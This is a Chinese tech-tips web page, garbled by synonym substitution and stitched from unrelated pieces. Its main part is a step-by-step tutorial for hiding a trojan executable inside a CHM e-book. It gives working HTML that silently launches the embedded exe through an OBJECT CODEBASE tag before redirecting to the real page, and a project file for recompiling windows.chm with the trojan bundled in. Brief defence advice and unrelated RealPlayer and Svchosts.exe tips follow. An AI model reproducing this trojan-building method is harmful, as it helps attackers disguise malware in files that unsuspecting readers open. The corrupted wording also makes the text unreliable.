谈起CHM格局的电子书,或者无人不晓。有很大一局部电子图书都是经常使用CHM格局编译的。因为木马程序嵌入了电子书中,杀毒软件无法对其中存在的病毒等破坏性程序启动审核和肃清。想知道这类电子书的制造方法吗?当天笔者就以实例方式和大家一道剖析一下。Step1:要想制造一个完美的CHM木马,当然少不了电子书的制造工具。在这里咱们选用微软自家的Microsoft HTML Help Workshop,汉化版本可以在下载。当然了,作为木马程序的载体,一本CHM电子书是少不了的。本文演示所驳回的是系统协助文件中现成的windows.chm。Step2:首先运转windows.chm,在右侧的空白处点击右键菜单,进入“属性”页。记载下该电子文档的自动主页default.htm和题目栏文字Windows 2000两项信息。Step3:接上去须要制造一个可以让木马运转并且同时可以智能跳转到windows.chm自动主页的网页,例如cytkk.htm,源代码如下:<HTML><HEAD><meta http-equiv="refresh" content="3;url='default.htm'"></HEAD><BODY><OBJECT Width=0 Height=0 TYPE="application/x-oleobject" CODEBASE="灰色按钮克星.exe"></OBJECT></BODY></HTML>代码注释:content="3是转向期间(单位为秒),可以依据木马程序的运转期间自行修正,倡导不要超越5秒。WWw.ItCoMputeR.cOm.CN其中的default.htm可以改为你用的电子书的自动主页名,灰色按钮克星.exe为木马程序名,你可以依据状况更改。Step4:运转HTML Help Workshop,选用文件菜单下的反编译项。接上去在反编译后的目录中可以看到windows.hhc(对应协助文档左侧的“目录”项)和windows.hhk(对应协助文档左侧的“索引”项)。Step5:如今要做的就是把木马程序复制到反编译后的目录中(本文中以拔出灰色按钮克星.exe这款小软件为例),并在此目录下建设一个例如文件名为cytkk.hhp的文件(用记事本即可),代码如下:[OPTIONS]Compatibility=1.1 Or laterCompiled file=windows.chmDefault Window=MainLanguage=0x804 中文(中国)[WINDOWS]Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0[FILES]cytkk.htm灰色按钮克星.exe代码注释:windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=前面改为在第一步时你获取的题目栏文字,windows.hhc及windows.hhk区分改为第三步获取的文件名。最后用HTML Help Workshop关上cytkk.hhp,点击“文件”→“编译”,待揭示实现后,就可以在指标目录中发现曾经编译好的带有木马的电子书windows.chm了。高手传经:防之有道咱们无法能对下载的每本书都启动反编译上班来加以审核,那是会累死人的。笔者倡导大家在下载电子书籍时,尽量去出名网站下载。另外读者好友们也可以修副本地安保属性,使CHM木马无法在本地运转木马程序,将注册表“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004项的值由原来十进制的0改为十六进制的3。
realsched.exe进程如何封锁
装了RealPlayer或RealOne后,关上Windows义务治理器,在进程外面会发现多了一个realsched.exe,而且是开机就有,只管占用内存很少,但关于谋求繁复美的用户来说看起来着实不爽,请问realsched.exe进程如何封锁呢?首先关上RealPlayer或RealOne,单击“工具→首选项”,区分去掉“智能服务”中“审核最新下载的媒体,减少到我的媒体库”和“智能下载和装置关键降级”前的复选框,按“确定”。
(本文为
电脑知识网介绍文章)
而后关上“首选项→智能服务→Real信息核心”,去掉“审核新信息”前的复选框,按“确定”。 在弹出的正告窗口点击“是”,这样,你就可以让realsched.exe进程彻底隐没。
揭示缺少Svchosts.exe文件
问:我经常使用的是Windows XP系统。不知道为什么,近来启动电脑输入治理员明码后要过很久能力进入。进入后揭示少了一个文件:C:\WINDOWS\Svchosts.exe,我搜查了但没找到这个文件,请问我该怎样办?
答:系统没有C:\WINDOWS\Svchosts.exe这个文件,说明你曾经或曾经感化了计算机病毒。你可以运转msconfig,关上启动选项卡,在外面寻觅命令中含有reg字样的选项,肃清前面的复选框。
© 版权声明